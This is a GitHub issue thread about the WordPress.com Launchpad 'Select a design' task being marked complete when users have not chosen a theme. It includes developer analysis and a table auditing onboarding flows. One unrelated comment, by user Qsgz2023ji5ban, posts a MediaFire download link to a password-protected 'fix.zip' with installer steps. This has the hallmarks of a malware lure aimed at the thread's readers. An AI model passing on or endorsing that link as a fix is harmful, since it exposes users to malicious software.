### ISSUE TITLE
Launchpad: Mark "Select a design" as pending if users have not explicitly picked a theme

### ISSUE THREAD

**Issue by taipeicoder** [Automattic/wp-calypso#93901]
## Description

See [context](https://wp.me/p58i-hYA/).

Currently, the "Select a design" task is marked as completed even in cases where the user hasn't explicitly switched to a new theme. Which is confusing, since they didn't really select anything.

![Image](https://github.com/user-attachments/assets/82b1a3d2-a9de-4b04-af4f-bf6fe21a9185)

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mmtr** [comment]
Looks like this comes from here: https://github.com/Automattic/jetpack/blob/39b42750147c491d52ef22b4a238b442bc4f349b/projects/packages/jetpack-mu-wpcom/src/features/launchpad/launchpad-task-definitions.php#L68

The task is always assumed to be completed, but not every onboarding flow ensures that the task is completed.

For instance, in the write flow we show this screen:

<img width="2027" alt="Screenshot 2024-08-26 at 17 58 20" src="https://github.com/user-attachments/assets/eb463640-4aac-4f03-9967-0ac9f1d39bc8">

After writing the first with the "Draft your first post" post, we don't redirect users back to this screen. Instead we show the launchpad and the "Select a design" task will be already inaccurately completely.

Seems that we have a similar `design_completed` task for that reason: https://github.com/Automattic/jetpack/blob/39b42750147c491d52ef22b4a238b442bc4f349b/projects/packages/jetpack-mu-wpcom/src/features/launchpad/launchpad-task-definitions.php#L54

However the write flow currently uses `design_selected`:  https://github.com/Automattic/jetpack/blob/abb0eda7c453c99c676c2cecc9f84136ed99143a/projects/packages/jetpack-mu-wpcom/src/features/launchpad/launchpad.php#L123

Whoever picks this issue should audit [all the launchpad tasks definitions](https://github.com/Automattic/jetpack/blob/abb0eda7c453c99c676c2cecc9f84136ed99143a/projects/packages/jetpack-mu-wpcom/src/features/launchpad/launchpad.php#L40) using the `design_selected` task and ensure that the `design_completed` task is used instead if the flow does not guarantee that a design is selected.

**Comment by dsas** [comment]
Flows with `design_selected`:

Task list | Code | Entrypoint | Design selected guarantee?
-------|------|------|------
 Link in Bio tld | [code](https://github.com/Automattic/jetpack//blob/8102408b890076d7c0c8a5a68da2c4dcbabbee98/projects/packages/jetpack-mu-wpcom/src/features/launchpad/launchpad.php#L76) | [via w.link](https://wordpress.com/setup/link-in-bio-tld) | Yes - its own unskippable lib selector
Link in Bio | [code](https://github.com/Automattic/jetpack//blob/8102408b890076d7c0c8a5a68da2c4dcbabbee98/projects/packages/jetpack-mu-wpcom/src/features/launchpad/launchpad.php#L63) | [Dunno](https://wordpress.com/setup/link-in-bio) | Yes, as above 
Writing | [code](https://github.com/Automattic/jetpack//blob/8102408b890076d7c0c8a5a68da2c4dcbabbee98/projects/packages/jetpack-mu-wpcom/src/features/launchpad/launchpad.php#117) | Go through the /start flow, choose write goal, then choose to create post | NO needs fix as it is pretty visible in the normal flow
Readymade templates | [code](https://github.com/Automattic/jetpack//blob/8102408b890076d7c0c8a5a68da2c4dcbabbee98/projects/packages/jetpack-mu-wpcom/src/features/launchpad/launchpad.php#259) | [Go here](https://wpcalypso.wordpress.com/patterns/site-layouts/cafe) and pick site layout (not in prod) | Design selected guaranteed
AI Assembler | [code](https://github.com/Automattic/jetpack//blob/8102408b890076d7c0c8a5a68da2c4dcbabbee98/projects/packages/jetpack-mu-wpcom/src/features/launchpad/launchpad.php#275) | [here](https://wpcalypso.wordpress.com/setup/ai-assembler/) then New site (not in prod) | NO, first step is to use bigsky designer but can just go to wordpress.com/home/:siteSlug 
Build | ([code](https://github.com/Automattic/jetpack//blob/8102408b890076d7c0c8a5a68da2c4dcbabbee98/projects/packages/jetpack-mu-wpcom/src/features/launchpad/launchpad.php#L34)) | Go through the /start flow, choose build goal (?) | Yes
Free | ([code](https://github.com/Automattic/jetpack//blob/8102408b890076d7c0c8a5a68da2c4dcbabbee98/projects/packages/jetpack-mu-wpcom/src/features/launchpad/launchpad.php#L48)) | [Any CTA on here](https://wordpress.com/free/) | NO - leave the design step and go to wordpress.com/home/:siteSlug

**Comment by dsas** [comment]
Will look at the AI assembler flow separately - that will require changes in Calypso to mark the step as done once the generated design is saved

```
await updateLaunchpadSettings( siteId, {
	checklist_statuses: { plan_completed: true },
} );
```

**Comment by dsas** [comment]
Actually it sounds like there's some fairly intensive changes planned to the UI given that it's not available in prod anyway and it's not completely broken if you do what you're supposed to do, I'm just going to leave AI assembler alone.
